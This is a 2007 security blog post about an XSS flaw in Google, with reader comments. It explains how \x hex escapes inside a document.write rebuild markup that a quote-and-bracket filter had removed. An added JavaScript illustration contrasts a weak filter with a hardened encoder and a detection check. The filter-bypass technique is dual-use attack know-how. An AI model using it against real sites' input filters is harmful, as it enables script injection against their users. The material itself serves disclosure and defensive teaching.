Yet another XSS hole in Google
At 12:57 this morning Hong posted a working exploit against Google, based on some work he did on the 13th, finding another XSS vulnerability in Google. This one is a little more interesting than most, because it relies on a basic misunderstanding of what can be done inside a document.write. Google's engineers were smart enough to close off the obvious quotes and angle brackets, but because the output lands inside a document.write, you can use JavaScript escape characters to build a string that represents the output in question. Here is an example PoC:
As you can see, the \x represents a hex character. So basically pretend that you are going to URL encode something and then do a replace: any time you see "%", replace it with "\x". In this way no angle brackets, no quotes, no equals signs, and in fact no character other than a backslash and alphanumerics are required for the vector to fire. Pretty tricky stuff, especially since most people don't understand what can be done inside a document.write, including Google's developers. Nice find, Hong, and a nice demonstration of what is possible inside a document.write. Time to protect yourself from backslashes too, I'd say.
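As an added illustration (not code from the original post, and not Google's actual filter), the following JavaScript models the failure the post describes: a filter that strips only quotes and angle brackets lets a backslash-escaped string through, and once the browser's parser decodes the document.write string literal the markup is back. The hardened encoder beside it escapes every non-alphanumeric character, backslash included, so the value can never form an escape sequence of its own. The sample input is constructed for the demonstration.

```javascript
// Constructed stand-in for a filter that removes only quotes and angle brackets.
// Assumption: this is roughly the protection the post says was in place.
function weakFilter(s) {
  return s.replace(/["'<>]/g, "");
}

// Models what the JavaScript parser does with \xHH escapes inside a string
// literal passed to document.write. One pass, left to right, like the parser:
// a backslash produced by an earlier escape does not start a new escape.
function decodeJsStringLiteral(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// Hardened encoder for untrusted values placed inside a JS string literal:
// every character outside [A-Za-z0-9] becomes \xHH (or \uHHHH above 0xFF),
// so a backslash in the input is itself escaped and loses its meaning.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Check used for detection/regression testing: does the value still yield
// markup-significant characters after the parser has decoded it?
function yieldsMarkup(encodedValue) {
  return /[<>"']/.test(decodeJsStringLiteral(encodedValue));
}

// Constructed input in the form the post describes: no quotes or angle
// brackets, only backslash, "x", hex digits and letters.
const SAMPLE = "\\x3cb\\x3ehi\\x3c/b\\x3e";

function demo() {
  return {
    weakDecoded: decodeJsStringLiteral(weakFilter(SAMPLE)),   // "<b>hi</b>"
    weakUnsafe: yieldsMarkup(weakFilter(SAMPLE)),             // true
    hardenedDecoded: decodeJsStringLiteral(encodeForJsString(SAMPLE)), // literal text
    hardenedUnsafe: yieldsMarkup(encodeForJsString(SAMPLE)),  // false
  };
}
```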

January 15th, 2007 at 3:39 pm
[…] And meanwhile the XSS problems for Google continue. […]
January 15th, 2007 at 4:47 pm
[…] And meanwhile the XSS problems for Google continue. […]
January 16th, 2007 at 4:52 am
Ouch! That's gotta hurt them. Very clever find from Hong! Haven't seen such clever finds in a long time, I guess.
But, actually, strange that they let things echo back while inside a document.write routine. Bad practice if you ask me.